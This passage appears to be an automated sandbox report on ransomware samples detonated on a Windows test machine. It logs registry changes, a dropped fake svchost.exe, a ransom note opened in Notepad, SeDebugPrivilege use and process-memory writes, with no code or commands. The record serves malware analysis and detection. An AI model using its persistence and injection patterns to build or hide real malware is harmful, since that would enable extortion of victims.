Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: 33 N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-7298275ad4bcdad520077fb9464e9777591522c840d76e9fc3a34aa17b4403b2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\c.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-ded2b5c541c8bc976318035e5d339b055d3f14cdbc70b496e4e40ce2b2f2f2d6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3036 wrote to memory of 3440 N/A C:\Windows\system32\taskmgr.exe C:\Windows\system32\taskmgr.exe
PID 3036 wrote to memory of 3440 N/A C:\Windows\system32\taskmgr.exe C:\Windows\system32\taskmgr.exe
PID 2356 wrote to memory of 1792 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2356 wrote to memory of 1792 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1792 wrote to memory of 64 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-40a1c3ab6869ce4fc5237f521cae6d9dd97287627c9283d6b5bcbf02b946b277.exe
PID 1792 wrote to memory of 64 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-40a1c3ab6869ce4fc5237f521cae6d9dd97287627c9283d6b5bcbf02b946b277.exe
PID 1792 wrote to memory of 64 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-40a1c3ab6869ce4fc5237f521cae6d9dd97287627c9283d6b5bcbf02b946b277.exe
PID 1792 wrote to memory of 2220 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-7298275ad4bcdad520077fb9464e9777591522c840d76e9fc3a34aa17b4403b2.exe
PID 1792 wrote to memory of 2220 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-7298275ad4bcdad520077fb9464e9777591522c840d76e9fc3a34aa17b4403b2.exe
PID 1792 wrote to memory of 2220 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-7298275ad4bcdad520077fb9464e9777591522c840d76e9fc3a34aa17b4403b2.exe
PID 1792 wrote to memory of 3396 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-d43d393a57eba94438dc27c4a06940ff705d6cfc3327ee3a45480797b7f40b63.exe
PID 1792 wrote to memory of 3396 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-d43d393a57eba94438dc27c4a06940ff705d6cfc3327ee3a45480797b7f40b63.exe
PID 1792 wrote to memory of 3396 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-d43d393a57eba94438dc27c4a06940ff705d6cfc3327ee3a45480797b7f40b63.exe
PID 1792 wrote to memory of 2176 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766.exe
PID 1792 wrote to memory of 2176 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766.exe
PID 1792 wrote to memory of 2176 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766.exe
PID 1792 wrote to memory of 3012 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Encoder.gen-cc58ef77008f989fa8ccdb4d489be6633c4c2cace8f800dbdb6397b6a90b2366.exe
PID 1792 wrote to memory of 3012 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Encoder.gen-cc58ef77008f989fa8ccdb4d489be6633c4c2cace8f800dbdb6397b6a90b2366.exe
PID 1792 wrote to memory of 3012 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Encoder.gen-cc58ef77008f989fa8ccdb4d489be6633c4c2cace8f800dbdb6397b6a90b2366.exe
PID 64 wrote to memory of 1448 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-40a1c3ab6869ce4fc5237f521cae6d9dd97287627c9283d6b5bcbf02b946b277.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\c.exe
PID 64 wrote to memory of 1448 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-40a1c3ab6869ce4fc5237f521cae6d9dd97287627c9283d6b5bcbf02b946b277.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\c.exe
PID 1792 wrote to memory of 1216 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-ded2b5c541c8bc976318035e5d339b055d3f14cdbc70b496e4e40ce2b2f2f2d6.exe
PID 1792 wrote to memory of 1216 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-ded2b5c541c8bc976318035e5d339b055d3f14cdbc70b496e4e40ce2b2f2f2d6.exe
PID 1792 wrote to memory of 1216 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-ded2b5c541c8bc976318035e5d339b055d3f14cdbc70b496e4e40ce2b2f2f2d6.exe
PID 1792 wrote to memory of 3628 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Agent.pef-0d612a4cb723da27d89d54602bfb83a1d7067c4b1315604b1cc22734cae8f3ff.exe
PID 1792 wrote to memory of 3628 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Agent.pef-0d612a4cb723da27d89d54602bfb83a1d7067c4b1315604b1cc22734cae8f3ff.exe
PID 1792 wrote to memory of 3628 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Agent.pef-0d612a4cb723da27d89d54602bfb83a1d7067c4b1315604b1cc22734cae8f3ff.exe
PID 1792 wrote to memory of 928 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.pef-d21200eaa45fdfb70c681802a1b2a8a72135984fdcc5363d2f8aaa04b3059823.exe
PID 1792 wrote to memory of 928 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.pef-d21200eaa45fdfb70c681802a1b2a8a72135984fdcc5363d2f8aaa04b3059823.exe
PID 1792 wrote to memory of 928 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.pef-d21200eaa45fdfb70c681802a1b2a8a72135984fdcc5363d2f8aaa04b3059823.exe
PID 1792 wrote to memory of 4164 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe
PID 1792 wrote to memory of 4164 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe
PID 1792 wrote to memory of 3180 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe
PID 1792 wrote to memory of 3180 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f2568e132b3fedc231ea1c120bdcb294eb449a8ee6374b71baf071721ab10e2d.exe
PID 4164 wrote to memory of 4576 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe
PID 4164 wrote to memory of 4576 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe
PID 4576 wrote to memory of 1808 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe C:\Windows\system32\cmd.exe
PID 4576 wrote to memory of 1808 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe C:\Windows\system32\cmd.exe
PID 4576 wrote to memory of 4196 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe C:\Windows\system32\cmd.exe
PID 4576 wrote to memory of 4196 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.Win32.Blocker.vho-9c510fb052fc192f3413070c98441380e5acedf9d68956a7b5d33e7a9a28757a.exe C:\Windows\system32\cmd.exe
PID 2176 wrote to memory of 5024 N/A C:\Users\Admin\DEsktop\00476\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766.exe C:\Users\Admin\AppData\Roaming\Cntrlphse.exe
